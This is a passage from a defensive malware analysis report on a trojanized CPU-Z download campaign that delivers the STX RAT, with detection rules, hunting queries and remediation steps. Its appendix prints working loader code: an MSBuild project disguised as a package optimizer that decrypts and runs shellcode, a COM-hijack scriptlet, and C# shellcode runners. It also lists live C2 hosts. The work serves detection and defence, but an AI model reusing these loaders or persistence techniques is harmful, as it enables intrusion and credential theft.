powershell.exe -> chrome.exe (or chromium-based browser)
rundll32.exe "...\CRYPTBASE.dll",#1

6.4 Sigma / IDS Rules Triggered

Sigma Rules

Rule	Severity	Description
Malicious PowerShell Keywords	Medium	Detects keywords from PowerShell exploitation frameworks
Suspicious PowerShell WindowStyle Option	Medium	Hidden window execution
PowerShell Create Scheduled Task	Medium	Task scheduling for persistence
Potential Suspicious PowerShell Keywords	Medium	Exploitation framework indicators
(DLL high-severity sigma rule)	High	Triggered on CRYPTBASE.dll standalone analysis

IDS/Snort Rules

Rule	SID	Description
ET INFO Cloudflare DNS Over HTTPS Certificate Inbound	2027671	DoH usage detection

7. Sandbox Analysis Summary

7.1 CAPE Sandbox

Verdict: Malicious

Process Tree:

cpuz_x32.exe (PID: 6944)
cpuz_x64.exe (PID: 4036)
  -> powershell.exe -Command "[Console]::In.ReadToEnd() | Invoke-Expression" (PID: 6536)
       -> csc.exe /noconfig /fullpaths @"...\ktc155gm.cmdline" (PID: 7040)
            -> cvtres.exe /NOLOGO /READONLY ... (PID: 3016)
       -> chrome.exe (PID: 7064)
rundll32.exe "...\CRYPTBASE.dll",#1 (PID: 6060)
  -> rundll32.exe "...\CRYPTBASE.dll",#1 (PID: 6796)

Tags: DETECT_DEBUG_ENVIRONMENT, SELF_DELETE, MACRO_POWERSHELL, PERSISTENCE, OBFUSCATED, CHECKS_BIOS, CRYPTO, LONG_SLEEPS

DNS: download.cpuid.com -> 195.154.81.43

Key behaviors: Full persistence chain installed, C2 callback observed via DoH.

7.2 C2AE Sandbox

Key observation - direct C2 communication captured:

POST https://172.67.145.101/d/callback
Host: welcome.supp0v3.com
-> 200 OK, Content-Type: application/json, Content-Length: 55, via: 1.1 Caddy

POST https://104.21.63.112/d/callback
Host: welcome.supp0v3.com
-> 200 OK, Content-Type: application/json, Content-Length: 55, via: 1.1 Caddy

C2 responded with 55-byte JSON payload. The dual IP access confirms load balancing behind Cloudflare.

7.3 Dr.Web vxCube

Additional processes observed:

regsvr32.exe - COM registration (SCT scriptlet)
consent.exe - UAC elevation attempt
cmd.exe - Command shell spawned
slui.exe - Software Licensing UI (possible evasion)

Multiple persistence Run keys with different GUID names confirmed across execution.

7.4 Zenbox

Verdict: Classified as CLEAN (false negative)

Tags: CALLS_WMI, DETECT_DEBUG_ENVIRONMENT, CHECKS_BIOS

The Zenbox sandbox failed to trigger the full malicious chain, likely due to the malware's anti-sandbox checks detecting the environment. This highlights the malware's effective evasion capabilities.

8. AV Detection Summary

ZIP Package (22/77 detections)

Engine	Detection Name
Kaspersky	Backdoor.Win64.Alien.de
BitDefender	Gen:Variant.Tedy.913617
Microsoft	(heuristic)
Sophos	Mal/Generic-S
AhnLab-V3	Trojan/Win.Generic.C5868013
Antiy-AVL	Trojan[Backdoor]/Win64.Alien
Cynet	Malicious (score: 99)
Rising	Trojan.DLLHijack!8.198C3
Google	Detected
K7AntiVirus	Backdoor (006de0071)

CRYPTBASE.dll Variant (31/76 detections)

Engine	Detection Name
Microsoft	Trojan:Win32/Wacatac.B!ml
CrowdStrike	win/malicious_confidence_60%
ESET-NOD32	Generik.HGAMZVE trojan
Elastic	malicious (high confidence)
Symantec	ML.Attribute.HighConfidence
Kaspersky	(via Kingsoft: Backdoor.Alien)
DeepInstinct	MALICIOUS
Tencent	Malware.Win32.Gencirc
Alibaba	Backdoor:Win64/MalwareX
Rising	Backdoor.Alien!8.241

9. Detection & Hunting Guidance

YARA Rules (Draft)

rule CPU_Z_DLL_Sideload_Alien_2026 {
    meta:
        description = "Detects trojanized CPU-Z CRYPTBASE.dll proxy (April 2026 campaign)"
        author = "nemesis"
        date = "2026-04-10"
        reference = "VT: eff5ece65fb30b21a3ebc1ceb738556b774b452d13e119d5a2bfb489459b4a46"
        severity = "high"
        tlp = "amber"

    strings:
        // C2 config JSON embedded in .rdata
        $c2_config = "{\"tag\":\"tbs\",\"referrer\":\"cpz\",\"callback\":" ascii
        $c2_domain = "supp0v3.com" ascii wide
        $c2_callback = "/d/callback" ascii wide

        // DLL proxy indicators
        $real_dll = "C:\\Windows\\System32\\CRYPTBASE.dll" ascii
        $proxy_name = "proxy.dll" ascii
        $export1 = "SystemFunction036" ascii
        $export2 = "SystemFunction040" ascii

        // Zig runtime strings
        $zig_panic = "thread  panic:" ascii
        $zig_recursive = "aborting due to recursive panic" ascii
        $zig_stripped = "Unable to dump stack trace: debug info stripped" ascii

        // Heartbeat template
        $hello = "{\"hello\":\"\"}" ascii

    condition:
        (uint16(0) == 0x5A4D) and (
            $c2_config or
            ($proxy_name and 2 of ($export*, $real_dll)) or
            (2 of ($zig_*) and any of ($c2_*, $proxy_name))
        )
}

rule CPU_Z_Clippy_SCT_IPv6_Loader {
    meta:
        description = "Detects Clippy.sct IPv6-encoded .NET deserialization payload"
        author = "nemesis"
        date = "2026-04-10"
        severity = "high"

    strings:
        $ipv6_func = "decodeIpv6" ascii
        $ipv6_stream = "ipv6ToStream" ascii
        $ipv6_array = "IPV6_ARRAY" ascii
        $binfmt = "BinaryFormatter" ascii
        $dynInvoke = "DynamicInvoke" ascii
        $svcClass = "ServiceClass" ascii
        $moniker = "Moniker" ascii

    condition:
        3 of them
}

rule CPU_Z_MSBuild_Shellcode_Loader {
    meta:
        description = "Detects MSBuild .proj shellcode loader (XOR + NtAllocateVirtualMemory)"
        author = "nemesis"
        date = "2026-04-10"
        severity = "high"

    strings:
        $proj = "<UsingTask" ascii
        $codetask = "CodeTaskFactory" ascii
        $ntallocate = "NtAllocateVirtualMemory" ascii
        $xor_key = "(1 + (i % 17))" ascii
        $buildcache = "BuildCache.dat" ascii
        $delegate = "GetDelegateForFunctionPointer" ascii
        $pkg_optimizer = "PackageOptimizerTask" ascii

    condition:
        $proj and 2 of them
}

Sigma Detection Rules

PowerShell stdin execution:

title: Suspicious PowerShell Stdin Execution
status: experimental
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        Image|endswith: '\powershell.exe'
        CommandLine|contains: '[Console]::In.ReadToEnd()'
    condition: selection
level: high

MSBuild persistence pattern:

title: MSBuild Persistence via Registry Run Key
status: experimental
logsource:
    product: windows
    category: registry_set
detection:
    selection:
        TargetObject|contains: 'CurrentVersion\Run'
        Details|contains|all:
            - 'MSBuild.exe'
            - '.proj'
    condition: selection
level: high

Hunting Queries

Splunk:

index=windows sourcetype=WinEventLog:Microsoft-Windows-Sysmon/Operational EventCode=1
Image="*\\powershell.exe" CommandLine="*[Console]::In.ReadToEnd()*"
| stats count by Computer, ParentImage, User

index=windows sourcetype=WinEventLog:Microsoft-Windows-Sysmon/Operational EventCode=13
TargetObject="*\\CurrentVersion\\Run\\*" Details="*MSBuild.exe*" Details="*.proj*"
| stats count by Computer, TargetObject, Details

KQL (Microsoft Sentinel):

// PowerShell stdin execution
DeviceProcessEvents
| where FileName == "powershell.exe"
| where ProcessCommandLine has "[Console]::In.ReadToEnd()"
| project Timestamp, DeviceName, InitiatingProcessFileName, ProcessCommandLine

// MSBuild persistence via Run key
DeviceRegistryEvents
| where RegistryKey has "CurrentVersion\\Run"
| where RegistryValueData has "MSBuild.exe" and RegistryValueData has ".proj"
| project Timestamp, DeviceName, RegistryKey, RegistryValueData

// R2 bucket download detection (proxy/firewall logs)
DeviceNetworkEvents
| where RemoteUrl has_any ("pub-45c2577dbd174292a02137c18e7b1b5a.r2.dev",
                            "pub-fd67c956bf8548b7b2cc23bb3774ff0c.r2.dev",
                            "pub-f3252d8370f34f0d9f3b3c427d3ac33c.r2.dev")
| project Timestamp, DeviceName, RemoteUrl, InitiatingProcessFileName

// DNS-over-HTTPS to resolve C2
DeviceNetworkEvents
| where RemoteUrl has "1.1.1.1/dns-query" and RemoteUrl has "supp0v3"
| project Timestamp, DeviceName, RemoteUrl

// Chrome launched by PowerShell (suspicious parent)
DeviceProcessEvents
| where FileName in~ ("chrome.exe", "msedge.exe")
| where InitiatingProcessFileName == "powershell.exe"
| project Timestamp, DeviceName, InitiatingProcessCommandLine, ProcessCommandLine

10. Remediation Steps

Immediate Actions

Block C2 domain at DNS, proxy, and firewall level:
- supp0v3.com and *.supp0v3.com
Block R2 distribution domains:
- pub-45c2577dbd174292a02137c18e7b1b5a.r2.dev
- pub-fd67c956bf8548b7b2cc23bb3774ff0c.r2.dev
- pub-f3252d8370f34f0d9f3b3c427d3ac33c.r2.dev
Block backend IP: 147.45.178.61 (real server, not behind CDN)
Block C2 Cloudflare IPs (shared CDN -- use with caution or block via SNI/domain):
- 104.21.63.112
- 172.67.145.101
Search for IOC file hashes across EDR/AV telemetry (see Section 6.1 for full list)
Search for registry persistence indicators on all endpoints
Alert users who downloaded CPUID software between April 9-10, 2026 to check for compromise

Host Remediation (if infected)

Delete all persistence and payload files:
- C:\Users\<USER>\AppData\Local\Microsoft\MSBuild\c_3791.proj
- C:\Users\<USER>\AppData\Local\Packages\MSBuild\CommonBuild.proj
- C:\Users\<USER>\AppData\Local\Microsoft\MSBuild\Current\Cache\BuildCache.dat
- C:\Users\<USER>\AppData\Local\Microsoft\Internet Explorer\ActiveX.sct
- C:\Users\<USER>\AppData\Local\Microsoft\Internet Explorer\Clippy.sct
- C:\Users\<USER>\AppData\Local\Microsoft\Internet Explorer\data.dat
- C:\Users\<USER>\AppData\Local\Microsoft\Windows\PowerShell\autorun.ps1
- Any CRYPTBASE.dll outside of C:\Windows\System32\
Remove registry keys:
- All HKCU\...\Run\ values referencing MSBuild .proj files or autorun.ps1
- HKCU\Software\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B} (all subkeys)
Remove scheduled tasks referencing MSBuild .proj files or hidden PowerShell (check for 68-minute interval tasks)
Check for and remove:
- Temporary compiled DLLs in %TEMP%\<random>\ directories
- Any .sct files in %LOCALAPPDATA%\Microsoft\Internet Explorer\
- Any version.dll outside of C:\Windows\System32\ (FileZilla variant)
Verify legitimacy of any recently downloaded CPUID or FileZilla software by checking hashes against known-good versions
Re-image the host if full compromise is confirmed (recommended -- the malware has 4 independent persistence paths and C2-delivered payloads may have installed additional backdoors)

11. References & VirusTotal Links

VirusTotal

Primary samples:

C2-delivered persistence components:

Infrastructure:

Related Research & Community Reporting (2026 Incident)

Doc TB / CPUID official statement -- "side API compromised for ~6 hours"
vx-underground - CPUID domain delivering malware confirmation -- "deeply trojanized, same group as FileZilla"
Eric Parker - CPU-Z & HWMONITOR compromised
Grummz - CPUID website infected warning
CyberInsider - HWMonitor and CPU-Z downloads hijacked to deliver malware
igor'sLAB - CPUID Suspected of Being a Virus; Suspicious HWMonitor Downloads
CyberNews - CPUID website compromised with malware
dev.ua - Hackers hacked the CPUID website
VideoCardz - CPU-Z and HWMonitor installers flagged for malware
Hacker News discussion
MS Flight Simulator Forums - PSA about HWMonitor malware

STX RAT Documentation

eSentire TRU - STX RAT: A new RAT in 2026 with Infostealer Capabilities -- first public documentation; confirms 147.45.178.61, FileZilla vector, all persistence methods
GBHackers - STX RAT Hides Remote Desktop, Steals Data
Infosecurity Magazine - STX RAT Targets Finance Sector
CyberSecurity News - New STX RAT Uses Hidden Remote Desktop

Historical Reference (2023 Campaign)

MITRE ATT&CK

Appendix A: Extracted Backdoor Components

The malware uses a multi-layer persistence architecture with three dropped components that work together. The C# "backdoor" is not a single file - it's a chain of three components that ultimately execute shellcode from disk.

A.1 CommonBuild.proj / c_3791.proj - MSBuild Shellcode Loader

SHA256: 1f7fa30eefeedfdcaaf0eca7d20d866fd48e5d3e75dbe7e47976bac3c097b271 Size: 3,984 bytes Purpose: Persistence entry point. Executed by MSBuild.exe via registry Run key and scheduled task. Contains inline C# that reads BuildCache.dat, XOR-decrypts it, and executes the result as shellcode.

The .proj file masquerades as a legitimate MSBuild package optimizer ("Microsoft.Build.PackageOptimizer v2.1.4") to avoid suspicion:

<Project Sdk="Microsoft.NET.Sdk" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <PropertyGroup>
    <AssemblyName>Microsoft.Build.PackageOptimizer</AssemblyName>
    <Description>Optimizes package dependencies and build performance</Description>
  </PropertyGroup>

  <UsingTask TaskName="PackageOptimizerTask" TaskFactory="CodeTaskFactory"
             AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll">
    <Task>
      <Code Type="Class" Language="cs"><![CDATA[
        using System;
        using System.IO;
        using System.Runtime.InteropServices;
        using Microsoft.Build.Framework;
        using Microsoft.Build.Utilities;

        public class PackageOptimizerTask : Task {
            [DllImport("ntdll.dll")]
            private static extern uint NtAllocateVirtualMemory(IntPtr ProcessHandle,
                ref IntPtr BaseAddress, IntPtr ZeroBits, ref IntPtr RegionSize,
                uint AllocationType, uint Protect);

            [DllImport("kernel32.dll")]
            private static extern IntPtr GetCurrentProcess();

            public override bool Execute() {
                OptimizePackageCache();
                return true;
            }

            private void OptimizePackageCache() {
                string cachePath = "C:\\Users\\Bruno\\AppData\\Local\\Microsoft\\MSBuild\\Current\\Cache\\BuildCache.dat";
                if (File.Exists(cachePath)) {
                    byte[] cacheData = File.ReadAllBytes(cachePath);
                    ProcessOptimizationCache(cacheData);
                }
            }

            // XOR decryption: key = (1 + (index % 17))
            private void ProcessOptimizationCache(byte[] data) {
                for (int i = 0; i < data.Length; i++) {
                    data[i] = (byte)(data[i] ^ (1 + (i % 17)));
                }
                ExecuteOptimization(data);
            }

            // Shellcode execution via NtAllocateVirtualMemory + delegate invoke
            private void ExecuteOptimization(byte[] optimization) {
                IntPtr hProcess = GetCurrentProcess();
                IntPtr baseAddr = IntPtr.Zero;
                IntPtr size = new IntPtr(optimization.Length);
                uint result = NtAllocateVirtualMemory(hProcess, ref baseAddr,
                    IntPtr.Zero, ref size, 0x3000, 0x40);  // RWX
                if (result == 0) {
                    Marshal.Copy(optimization, 0, baseAddr, optimization.Length);
                    var del = Marshal.GetDelegateForFunctionPointer(baseAddr, typeof(Action));
                    del.DynamicInvoke();
                }
            }
        }
      ]]></Code>
    </Task>
  </UsingTask>
</Project>

Key details:

XOR key: rolling (1 + (i % 17)) - a 17-byte repeating pattern
Payload file: BuildCache.dat (written by the initial PowerShell stage)
Uses NtAllocateVirtualMemory with PAGE_EXECUTE_READWRITE (0x40)
Executes shellcode via Marshal.GetDelegateForFunctionPointer + DynamicInvoke

A.2 ActiveX.sct - COM Hijacking Scriptlet (Stage Launcher)

SHA256: 0d8d759db6c2012210a07ca825b01f727a3a23d615b8dbb4c241b508b2011448 Size: 977 bytes Purpose: COM TypeLib hijacking persistence. When any application loads the hijacked TypeLib GUID {EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}, this scriptlet runs and launches the next stage (Clippy.sct) via regsvr32.exe.

<?xml version="1.0"?>
<scriptlet>
    <registration description="explorer" progid="explorer" version="1.2"
        classid="{0F859660-3A3E-4B16-8D75-260D132F9C4B}">
    </registration>
    <script language="JScript"><![CDATA[
      var WShell = new ActiveXObject("WScript.Shell");
      WShell.Run('regsvr32.exe /s /u "/i:C:\\Users\\Bruno\\AppData\\Local\\Microsoft\\Internet Explorer\\Clippy.sct" scrobj.dll', 0, false);
    ]]></script>
</scriptlet>

Key details:

Uses regsvr32.exe LOLBin to load Clippy.sct (T1218.010)
/s = silent, /u = unregister (but /i: overrides with the SCT URL)
Window style 0 = hidden

A.3 Clippy.sct - IPv6-Encoded .NET Deserialization Shellcode Runner

SHA256: 02ff4cf4bea26993e4556706bada73fce98284388c57bad31ceb784c4791a703 Size: 11,879 bytes Purpose: The main execution payload. Contains a full .NET assembly (Moniker.dll) encoded as an array of IPv6 addresses, deserialized via BinaryFormatter, which reads and executes shellcode from a file on disk.

Encoding technique: A compiled .NET PE is serialized with BinaryFormatter, then each 16-byte group is encoded as an IPv6 address. The decoder reverses this:

function decodeIpv6(ip) {
    // Expand :: shorthand, split on ':', parse each group as hex
    // Each group produces 2 bytes (high byte, low byte)
    // Returns array of raw bytes
}

function ipv6ToStream(arr) {
    var ms = new ActiveXObject("System.IO.MemoryStream");
    for (var i = 0; i < arr.length; i++) {
        var bytes = decodeIpv6(arr[i]);
        for (var j = 0; j < bytes.length; j++) ms.WriteByte(bytes[j]);
    }
    ms.Position = 0;
    return ms;
}

Execution chain in Clippy.sct:

Set CachePath environment variable to data.dat location
Decode the IPv6 array into a MemoryStream
Deserialize with BinaryFormatter → creates a delegate chain
DynamicInvoke → Assembly.Load(byte[]) → loads Moniker.dll
CreateInstance('ServiceClass') → constructor runs the shellcode loader

Extracted Moniker.dll (.NET assembly):

SHA256: 3d805bd27ceb641615b755d26092b13c135e1f3eb9f9758cd9df4bd08ace3d2d Size: 4,185 bytes Architecture: i386 (.NET IL)

Reconstructed C# source:

using System;
using System.IO;
using System.Runtime.InteropServices;

[ComVisible(false)]
public class ServiceClass
{
    [DllImport("kernel32.dll")]
    private static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize,
        uint flAllocationType, uint flProtect);

    [DllImport("kernel32.dll")]
    private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,
        uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter,
        uint dwCreationFlags, out uint lpThreadId);

    [DllImport("kernel32.dll")]
    private static extern uint WaitForSingleObject(IntPtr hHandle, uint dwMilliseconds);

    public ServiceClass()
    {
        ProcessOptimizationCache();
    }

    private void ProcessOptimizationCache()
    {
        string cachePath = Environment.GetEnvironmentVariable("CachePath");
        // CachePath = "C:\Users\Bruno\AppData\Local\Microsoft\Internet Explorer\data.dat"

        if (File.Exists(cachePath))
        {
            byte[] buf = File.ReadAllBytes(cachePath);

            // Allocate RWX memory
            IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)buf.Length,
                0x3000,   // MEM_COMMIT | MEM_RESERVE
                0x40);    // PAGE_EXECUTE_READWRITE

            Marshal.Copy(buf, 0, addr, buf.Length);

            // Execute shellcode in new thread
            uint threadId;
            IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr,
                IntPtr.Zero, 0, out threadId);

            WaitForSingleObject(hThread, 0xFFFFFFFF); // INFINITE
        }
    }
}

A.4 Full Persistence Execution Flow

                    ┌─────────────────────────────────────────┐
                    │         PERSISTENCE TRIGGERS             │
                    │                                         │
                    │  1. Registry Run Key                    │
                    │     → powershell -WindowStyle hidden    │
                    │       -Command MSBuild.exe c_3791.proj  │
                    │                                         │
                    │  2. Scheduled Task (every 68 min)       │
                    │     → MSBuild.exe CommonBuild.proj      │
                    │                                         │
                    │  3. COM TypeLib Hijack                  │
                    │     → script:ActiveX.sct                │
                    │                                         │
                    │  4. PowerShell Profile autorun.ps1      │
                    └───────────┬─────────────────────────────┘
                                │
                ┌───────────────┼───────────────┐
                │               │               │
                ▼               ▼               ▼
        ┌──────────────┐  ┌──────────┐  ┌──────────────┐
        │ MSBuild Path │  │ COM Path │  │   PS Path    │
        │ c_3791.proj  │  │ActiveX.  │  │ autorun.ps1  │
        │              │  │  sct     │  │              │
        │ Reads:       │  │          │  │              │
        │ BuildCache   │  │ Launches │  │              │
        │   .dat       │  │ regsvr32 │  │              │
        │              │  │          │  │              │
        │ XOR decrypt  │  │ Loads    │  │              │
        │ key: 1+(i%17)│  │Clippy.sct│  │              │
        │              │  │          │  │              │
        │ Exec via     │  │ IPv6     │  │              │
        │ NtAllocate + │  │ decode → │  │              │
        │ delegate     │  │ BinFmt   │  │              │
        │ invoke       │  │ deser →  │  │              │
        │              │  │ Moniker  │  │              │
        │              │  │  .dll    │  │              │
        │              │  │          │  │              │
        │              │  │ Reads    │  │              │
        │              │  │ data.dat │  │              │
        └──────┬───────┘  │          │  │              │
               │          │ VirtAlloc│  │              │
               │          │ + thread │  │              │
               │          └────┬─────┘  └──────┬───────┘
               │               │               │
               └───────────────┼───────────────┘
                               │
                               ▼
                    ┌─────────────────────┐
                    │   SHELLCODE         │
                    │   (from disk file)  │
                    │                     │
                    │   → C2 callback     │
                    │   → Data exfil      │
                    │   → Remote access   │
                    └─────────────────────┘

A.5 BuildCache.dat / data.dat - Final Stage Shellcode

These are the final payload files written to disk by the PowerShell stage after receiving code from the C2. All persistence paths (MSBuild .proj, Clippy.sct -> Moniker.dll) ultimately read and execute these files.

BuildCache.dat is XOR-encrypted (key: 1+(i%17)) and read by CommonBuild.proj. data.dat is the same payload read by Moniker.dll. On VT they share the same hash -- confirming they are the same content.

Three versions recovered from VT spanning the full campaign timeline (all 0/77 detection -- undetected):

Version	SHA256	Size	PE Size	First Seen
December 2025	`b2c45a026a115e60b5908a1f8474ff4acc6e14a64308996e00d16c7c11665216`	710,731 B	355,348 B	2025-12-07
March 2026	`2fe5443d785667344916f4d4684db0666820cd45b7ed4eb3f2e389600bfd2480`	732,235 B	366,100 B	2026-03-20
April 2026	`d4ac7b02f1472f4f15a981a2a7ec89e9f35e2e15d9564ad679ac339d0968390e`	760,907 B	380,436 B	2026-04-09

XOR decryption confirmed: Applying data[i] ^ (1 + (i % 17)) to BuildCache.dat produces valid shellcode starting with fc 48 83 e4 f0 e8 00 00 00 00 (cld; and rsp,-0x10; call $+5).

Cross-version analysis confirmed same campaign:

Identical shellcode stub architecture (PIC call $+5 / pop rax technique)
Same reflective loader at constant offset +0x11F4 in all three versions
PE headers 504/512 bytes identical across versions (8 bytes differ = size fields)
Monotonically growing payload: 710KB -> 732KB -> 760KB (+21KB/month average)
Same single import: KERNEL32.dll
Same PE section layout: .text$mn, .rdata, .rdata$voltmd, .rdata$zzzdbg

Decrypted structure:

Offset 0x00-0x32: Shellcode stub (PIC, stack-aligned)
  fc              cld
  48 83 e4 f0     and rsp, -0x10           ; Align stack
  e8 00 00 00 00  call $+5                 ; Get RIP
  58              pop rax                  ; RAX = current addr
  48 05 29 00 00  add rax, 0x29            ; RAX -> metadata
  48 89 c1        mov rcx, rax             ; Arg1 = metadata
  48 89 c2        mov rdx, rax
  48 81 c2 XX XX  add rdx, <PE_offset>     ; RDX -> PE base
  48 89 d3        mov rbx, rdx
  48 81 c3 f4 11  add rbx, 0x11F4          ; RBX -> reflective loader
  48 83 ec 20     sub rsp, 0x20            ; Shadow space
  48 ff d3        call rbx                 ; Execute reflective loader

Offset 0x33-0x3E: Metadata header
  [0x33] Total PE size (DWORD)
  [0x37] Flags = 2 (DWORD)
  [0x3B] Raw PE data size (DWORD)

Offset 0x3F+: Embedded PE "out.dll" (encrypted, entropy ~8.0)
  MZ header -> reflective loader at +0x11F4
  Imports only KERNEL32.dll
  Sections: .text$mn, .rdata, .rdata$voltmd, .rdata$zzzdbg, .xdata, .edata, .pdata

A.6 Shellcode Disassembly and Annotation

The full shellcode + reflective loader + out.dll main function have been disassembled and annotated.

Reflective Loader (offset 0x1233, Stephen Fewer-style)

Uses dual-hash API resolution: ROR13 for the initial PEB walk (finding kernel32/ntdll), ROR14 for the embedded PE's API resolution.

Resolved API hash table (reflective loader, ROR13):

Hash	API	Module
`0x6a4abc5b`	(module) kernel32.dll	PEB walk, UTF-16LE byte hash
`0x3cfa685d`	(module) ntdll.dll	PEB walk, UTF-16LE byte hash
`0xec0e4e8e`	LoadLibraryA	kernel32.dll
`0x7c0dfcaa`	GetProcAddress	kernel32.dll
`0x91afca54`	VirtualAlloc	kernel32.dll
`0x60e0ceef`	ExitThread	kernel32.dll

Reflective loader flow:

Walk PEB -> Ldr -> InMemoryOrderModuleList to find kernel32.dll and ntdll.dll
Parse export tables to resolve LoadLibraryA, GetProcAddress, VirtualAlloc, ExitThread
VirtualAlloc(NULL, SizeOfImage, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) -- allocate memory for PE
Copy PE headers to allocated memory
Map each PE section from raw offset to virtual address
Process import directory: LoadLibraryA for each DLL, GetProcAddress for each function
Process base relocations (delta fixups for ASLR)
NtFlushInstructionCache -- flush CPU instruction cache
Calculate entry point address (ImageBase + AddressOfEntryPoint)
jmp rax -- jump to out.dll DllMain with fdwReason = 0x0A (custom reason code)

The custom reason code 0x0A (decimal 10) is a canary value -- only the reflective loader passes this value. If DllMain is called normally by Windows (reasons 0-3), the malicious code path is never triggered.

out.dll Entry Point (RVA 0x1000)

001000: sub  rsp, 0x28
001004: cmp  edx, 1              ; DLL_PROCESS_ATTACH?
001007: jne  check_custom
001009: mov  [rip+0xb9870], r8   ; Save lpReserved (normal load)
001010: jmp  exit_ok

check_custom:
001012: cmp  edx, 0xa            ; Custom reason 0x0A from reflective loader?
001015: jne  exit_ok
001017: mov  rcx, r8             ; Pass lpReserved as argument
00101a: call 0x115c              ; >>> MAIN MALICIOUS FUNCTION <<<

exit_ok:
00101f: mov  eax, 1              ; Return TRUE
001028: ret

out.dll Main Function (RVA 0x115C) -- Annotated

Resolved API hash table (out.dll, ROR14):

Hash	API	Module
`0x1ff5154e`	(module) kernel32.dll	PEB walk, ASCII lowercase ROR14
`0xbda4b2ca`	(module) ntdll.dll	PEB walk, ASCII lowercase ROR14
`0x5733ec35`	VirtualProtect	kernel32.dll
`0x758bd126`	CreateThread	kernel32.dll
`0x32ac9136`	WaitForSingleObject	kernel32.dll
`0x5a90917e`	NtFlushInstructionCache	ntdll.dll

; === Stage 1: XXTEA DECRYPT (Corrected Block TEA) ===
00116e: lea  r8, [rip+0x5dcd3]      ; R8 = encrypted data blob in .data section
001175: lea  rcx, [rip+0x2e84]      ; RCX = XXTEA key pointer (4 DWORDs at .data start)
00117c: mov  edx, 0x16b90           ; EDX = 0x16B90 DWORDs (93,072 bytes = 23,268 DWORDs)
001181: call 0x12cc                  ; XXTEA decryption (delta=0x9E3779B9, key=4 DWORDs)

; === Stage 2: DEFLATE DECOMPRESS (RFC 1951) ===
001186: mov  r9d, 0x5ae3c           ; R9 = 0x5AE3C = decompressed size (372,284 bytes)
00118c: mov  [rsp+0x48], 0x5ba00    ; Output buffer = 0x5BA00 bytes (374,272 bytes)
0011a7: call 0x1d28                  ; Raw DEFLATE inflate (custom impl, tables in .rdata)
0011ac: test eax, eax               ; Check decompression success
0011ae: jne  cleanup                 ; If failed, exit

; === Stage 3: Resolve APIs via PEB walk + ROR14 hashing ===
0011b4: mov  ecx, 0x1ff5154e        ; kernel32.dll module hash
0011b9: call resolve_module          ; Walk PEB to find kernel32 base

0011be: mov  edx, 0x5733ec35        ; VirtualProtect hash
0011c9: call resolve_function        ; -> stored globally

0011ce: mov  edx, 0x758bd126        ; CreateThread hash
0011dd: call resolve_function        ; -> stored globally

0011e2: mov  edx, 0x32ac9136        ; WaitForSingleObject hash
0011f1: mov  rdi, rax               ; Save CreateThread ptr in RDI
0011f4: call resolve_function        ; -> stored globally

0011f9: mov  ecx, 0xbda4b2ca        ; ntdll.dll module hash
001205: call resolve_module          ; Walk PEB to find ntdll base

00120a: mov  edx, 0x5a90917e        ; NtFlushInstructionCache hash
001212: call resolve_function        ; -> stored globally

; === Stage 4: Launch backdoor thread ===
00121d: lea  r8, [rip+0x3c]         ; R8 = thread function (at RVA 0x1260)
001229: mov  r9, rsi                ; R9 = lpParameter (shellcode base addr)
001235: xor  ecx, ecx               ; lpThreadAttributes = NULL
001237: call rdi                     ; CreateThread(NULL, 0, thread_func, base, 0, NULL)

; === Stage 5: Wait for thread completion ===
00123e: or   edx, -1                ; dwMilliseconds = INFINITE (0xFFFFFFFF)
001241: mov  rcx, rax               ; hHandle = thread handle
001244: call [WaitForSingleObject]   ; Block until thread exits

; === Cleanup and return ===
001250: <restore registers>
00125f: ret

Summary: The out.dll main function performs:

XXTEA decryption (Corrected Block TEA, delta=0x9E3779B9): Decrypts 93KB from .data using a 128-bit key (4 DWORDs at .data[0:16])
DEFLATE decompression (raw RFC 1951, custom implementation): Inflates decrypted data to 374KB using lookup tables in .rdata
Dynamic API resolution from kernel32.dll and ntdll.dll using ROR14 hashing
CreateThread to launch the decompressed C2 beacon (function at RVA 0x1260)
WaitForSingleObject(INFINITE) to block until the beacon thread exits

The thread function at 0x1260 does NOT directly handle C2 -- it is a small trampoline that:

Calls VirtualProtect on the decompressed buffer (0x5BA00 bytes, PAGE_EXECUTE_READWRITE)
Calls NtFlushInstructionCache to ensure CPU sees the new code
Calculates the entry point: base + offset (offset stored at .data[0:4])
Jumps into the decompressed 374KB payload -- which IS the actual C2 beacon

The 374KB decompressed payload is a position-independent C2 beacon classified by Kaspersky as Backdoor.Win64.Alien.de (Kaspersky Threat Encyclopedia).

Beacon identification -- STX RAT:

Name: STX RAT (named for STX/0x02 magic byte prefix in C2 messages)
First documented: February 2026 by eSentire TRU
AV classifications: Kaspersky: Backdoor.Win64.Alien.de, Ikarus: Trojan-Spy.StxRat, BitDefender: Gen:Variant.Tedy
C2 protocol: X25519 ECDH key exchange + Ed25519 signature validation + ChaCha20-Poly1305 encryption over TCP
C2 server: 95.216.51.236 (Hetzner, Finland) -- confirmed: our FileZilla version.dll contacts this exact IP
Capabilities: Hidden VNC (HVNC), credential theft (browsers, FTP, crypto wallets), reverse proxy tunneling, in-memory payload execution, AMSI ghosting
C2 callback URL in process memory: https://welcome.supp0v3.com/d/callback (VT memory_pattern_urls)

14 independent matches confirm STX RAT identification:

#	Feature	eSentire Report	Our Analysis
1	Distribution	Trojanized FileZilla installers	FileZilla_3.69.5_win64.zip + version.dll
2	Download IP	`147.45.178.61`	`ai.supp0v3.com` -> `147.45.178.61`
3	Attack chain	VBS -> JScript /elevated -> PowerShell	Identical 3-layer chain in VBS payloads
4	TAR structure	`1.bin` (RAT) + `2.txt` (PS loader)	Same from `qwen1.pages.dev`
5	Persistence #1	HKCU Run -> `autorun.ps1`	Same
6	Persistence #2	MSBuild .proj with C# payload	Same (`c_3791.proj`, `CommonBuild.proj`)
7	Persistence #3	COM hijack `{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}`	Exact same GUID -> ActiveX.sct
8	Process check	Must run in `powershell` or `msbuild`	All paths use PowerShell or MSBuild
